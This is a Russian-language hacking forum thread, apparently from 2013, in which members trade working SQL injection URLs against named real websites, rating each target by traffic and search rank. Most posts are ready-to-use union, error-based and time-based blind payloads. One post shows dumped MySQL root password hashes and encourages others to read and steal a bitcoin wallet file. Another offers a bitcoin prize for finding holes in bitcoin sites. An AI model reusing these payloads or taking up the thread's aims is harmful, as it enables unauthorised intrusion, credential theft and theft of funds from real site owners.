SQL Инъекции

Discussion in 'Уязвимости' started by m0nzt3r, 4 Jul 2006.

Thread Status:
Not open for further replies.
  1. GhostW

    GhostW Member

    Joined:
    17 Oct 2012
    Messages:
    209
    Likes Received:
    46
    Reputations:
    33
    Code:
    http://www.perthanddistrictanglersassociation.com/News.php?newsID=-87+union+select+1,2,3,4,concat_ws(0x3a,version(),user(),database()),6,7,8,9--
     
  2. Sum.cogitans

    Sum.cogitans Elder - Старейшина

    Joined:
    7 Sep 2013
    Messages:
    178
    Likes Received:
    32
    Reputations:
    19
    Вот знаете, утро как-то сразу задалось настроение прям радостное сразу.

    Официальный сайт Анфисы Чеховой:
    Code:
    www.achekhova.ru/img.php?id=-99+UNION+SELECT+1,2,3,group_concat(user(),0x3a,version(),0x3a,database())+--+&rub=press
    P.s. Результат в сорсе смотрите, или в URL изображения.
    P.p.s. Ну ловко ребята вывод ошибки скрыть попытались. Юзаем cmd+a\ctrl+a.

    UPD Нарыл схему DB crawlp - URL, дальше сами, а мне работать пора .)

    На закуску:
    Code:
    http://www.osnova-pc.ru/prosmotr_posta.php?id=-85'+UNION+SELECT+1,2,group_concat(user(),0x3a,version(),0x3a,database()),4,5,6,7,8,9,10,11+--+
    joomla
    ТИЦ\PR шлак
    Траф 2.5 в неделю
    Позиции в яндексе интересные: http://pr-cy.ru/a/www.osnova-pc.ru
     
    #15622 Sum.cogitans, 29 Oct 2013
    Last edited: 29 Oct 2013
  3. \/IRUS

    \/IRUS Elder - Старейшина

    Joined:
    3 Aug 2012
    Messages:
    387
    Likes Received:
    493
    Reputations:
    37
    [​IMG]

    http://bitvisitor.com/ - заработай биткоины за просмотр сайтов

    на главной в заголовке Referer
    MySQL AND/OR time-based blind

    web server operating system: Linux Debian 6.0 (squeeze)
    web application technology: PHP 5.3.3, Apache 2.2.16
    banner: '5.1.66-0+squeeze1-log'

    current user: root

    database management system users password hashes:
    [*] root [2]:
    password hash: *AC3AC8E16952F531C8E9FE03ECD18DA0E0E771C7
    password hash: *ED5785C53CE4F9F7A220427C0F14905F92E6695B

    File_Priv=Y

    можно LOAD_FILE('**********/.bitcoin/wallet.dat') :D

    на кошеле половинка биткоина (~100$)
    я не трогал, кто хочет заработать вперед :)
     
    4 people like this.
  4. Unknowhacker

    Unknowhacker Member

    Joined:
    25 May 2013
    Messages:
    256
    Likes Received:
    35
    Reputations:
    24
    ТЕХНО-М
    Code:
    http://www.techno-m.ru/index.php?prod=93[COLOR=Red]+order+by+8+--+[/COLOR]
    Hi-tec.com.ua
    Code:
    http://hi-tec.com.ua/index.php?idmainproduct=-91+union+select+1,2,%28select%28@x%29from%28select%28@x:=0x00%29,%28select%28null%29from%28hiteccomua_kbt.kbt_user%29where%280x00%29in%28@x:=concat%28@x,0x3c62723e,uname,0x3a,pass%29%29%29%29x%29,4,5,6,7,8,9+--+
     
    #15624 Unknowhacker, 30 Oct 2013
    Last edited: 30 Oct 2013
  5. \/IRUS

    \/IRUS Elder - Старейшина

    Joined:
    3 Aug 2012
    Messages:
    387
    Likes Received:
    493
    Reputations:
    37
    [​IMG]

    time-based blind

    http://www.bitcoinlivebets.com/index.php?action=livewetten&qf=%22%2b(select(0)from(select(sleep(6)))v)%2b%22&u=livebereich

    биткоэны Отаке! :D

    КОНКУРС: кто постит следующую уязвимость на Биткоен сайте получает от меня 1 BTC ~ 197$ (начало 31.10.13, конец 02.11.13)

    P.S. ОБЯЗАТЕЛЬНО!!! присутствие слова bitcoin в названии сайта.
     
    #15625 \/IRUS, 31 Oct 2013
    Last edited: 31 Oct 2013
  6. qaz

    qaz Elder - Старейшина

    Joined:
    12 Jul 2010
    Messages:
    1,654
    Likes Received:
    173
    Reputations:
    75
    www.igornikolaev.ru

    Офф сайт Игоря Николаева

    PHP:
    http://www.igornikolaev.ru/music/textout.php?id=94+or+1+group+by+concat((<sql>),0x00,floor(rand(0)*2))having+min(0)+or+1--+
    db 5 version
    CY:130||PR:


    ==================================================

    www.inconnect-group.ru

    PHP:
    http://www.inconnect-group.ru/pressrelease/?id=96+limit+0,0+union+select+1,2,3,4,<sql>,6,7,8,9--+

    db 5 version
    CY:700||PR:5


    ==================================================

    www.agidis.ru

    PHP:
    http://www.agidis.ru/?id=98+or+1+group+by+concat((<sql>),0x00,floor(rand(0)*2))having+min(0)+or+1--+
    db 5 version
    CY:30||PR:2


    ==================================================

    www.landscrona.ru

    PHP:
    http://www.landscrona.ru/tales/index.php?id=115+limit+0,0+union+select+1,2,<sql>,4,5,6,7,8,9,10,11,12,13,14,15,16--+
    db 5 version
    CY:450||PR:4


    ==================================================
     
    #15626 qaz, 31 Oct 2013
    Last edited: 31 Oct 2013
    1 person likes this.
  7. compod

    compod Member

    Joined:
    28 Sep 2010
    Messages:
    34
    Likes Received:
    21
    Reputations:
    1
    CY - 120
    PR - 5

    Вывод в исходники, ищите по разделителю ~|~
    ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
     
  8. Amoura

    Amoura Elder - Старейшина

    Joined:
    23 Jan 2008
    Messages:
    244
    Likes Received:
    148
    Reputations:
    46
    Code:
    http://www.northernoutpost.com/news.php?id=13+AND+1=2+UNION+SELECT+1,2,3,version%28%29,5,6,7,8+--+
    Code:
    http://www.almarecords.com/news.php?id=39+AND+1=2+UNION+SELECT+1,2,version%28%29,4,5,6,7,8,9,10,11+--+
     
  9. compod

    compod Member

    Joined:
    28 Sep 2010
    Messages:
    34
    Likes Received:
    21
    Reputations:
    1
    Букинг отелей:
     
  10. palec2006

    palec2006 Banned

    Joined:
    30 Oct 2012
    Messages:
    40
    Likes Received:
    33
    Reputations:
    8
    Системы безопасности))


    db:5.5.31
    CY:1000
    PR:4
    Траф:10к


    мыльник достоин внимания.
     
    1 person likes this.
  11. GhostW

    GhostW Member

    Joined:
    17 Oct 2012
    Messages:
    209
    Likes Received:
    46
    Reputations:
    33
    Code:
    http://www.pangeaday.org/filmDetail.php?id=-47+union+select+1,2,3,4,5,6,concat_ws(0x3a,version(),user(),database()),8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23--
     
  12. Gorev

    Gorev Level 8

    Joined:
    31 Mar 2006
    Messages:
    2,594
    Likes Received:
    1,242
    Reputations:
    273
    http://www.lukoil.ro/statii.php?id=-232+union+select+1,2,3,4,5,6,7,8,9,0,1,2,concat_ws(0x3a,version(),user(),database()),4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9+--+
     
  13. YaBtr

    YaBtr Members of Antichat

    Joined:
    30 May 2012
    Messages:
    601
    Likes Received:
    350
    Reputations:
    652
    pr:4
    pr:4
    pr:7
     
  14. Unknowhacker

    Unknowhacker Member

    Joined:
    25 May 2013
    Messages:
    256
    Likes Received:
    35
    Reputations:
    24
    http://avtodvornik.com.ua/?ID=goods&select=8+order+by+2+--+
     
  15. YaBtr

    YaBtr Members of Antichat

    Joined:
    30 May 2012
    Messages:
    601
    Likes Received:
    350
    Reputations:
    652
    Читай 2ой абзац 1ого пункта правил этой темы.
    Старайся "доводить до ума" найденные инъекции.
    upd
     
    #15635 YaBtr, 8 Nov 2013
    Last edited: 8 Nov 2013
  16. GhostW

    GhostW Member

    Joined:
    17 Oct 2012
    Messages:
    209
    Likes Received:
    46
    Reputations:
    33
    Code:
    http://www.asmube.com.br/noticias.php?id=-11+union+select+concat_ws(0x3a,version(),user(),database()),2,3,4,5,6,7/*
    Code:
    http://www.licafusa.com.br/galeriadoscampeoes.php?id=-2+union+select+1,concat_ws(0x3a,version(),user(),database()),3,4--
    Code:
    http://www.noborder.org/item.php?id=-383+union+select+1,2,concat_ws(0x3a,version(),user(),database()),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27--
     
  17. YaBtr

    YaBtr Members of Antichat

    Joined:
    30 May 2012
    Messages:
    601
    Likes Received:
    350
    Reputations:
    652
    pr:7
    тИЦ:30

    pr:4
    pr:3
     
    #15637 YaBtr, 11 Nov 2013
    Last edited: 11 Nov 2013
  18. Unknowhacker

    Unknowhacker Member

    Joined:
    25 May 2013
    Messages:
    256
    Likes Received:
    35
    Reputations:
    24
    Code:
    http://www.rusderjavnaya.info/article.php?art_id=758+and+1=0+union+select+1,version%28%29+--+
    
    Code:
    http://www.diavia.ru/index.php?art_id=-6997+union+select+1,2,3,version%28%29,5,6,7+--+&p_id=6894&PHPSESSID=25e142491b9349684dbe1cb0c7216bdd
    4.0.26-log
     
    #15638 Unknowhacker, 11 Nov 2013
    Last edited: 11 Nov 2013
  19. BigBear

    BigBear Escrow Service
    Staff Member Гарант - Escrow Service

    Joined:
    4 Dec 2008
    Messages:
    1,789
    Likes Received:
    820
    Reputations:
    856
    Host:

    _http://dumskaya.net

    Injection:

    Code:
    http://dumskaya.net/post/-1%27+or+1=if(substr((@@version),1,1)=5,1,2)+--+/
    version() = 5.01

    TYC = 1000
    PR = 5
     
    _________________________
  20. Gorev

    Gorev Level 8

    Joined:
    31 Mar 2006
    Messages:
    2,594
    Likes Received:
    1,242
    Reputations:
    273
    http://www.kdoexpo.com/cadeau-cadre-photo-numerique-pfx-1000.php?id=199+UNION+SELECT+1,2,concat_ws(0x3a,version(),database(),user()),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55+LIMIT+1,1--

    4.0.25-standard-log:kdoexpo:kdoexpo@10.0.84.190
     
Loading...
Thread Status:
Not open for further replies.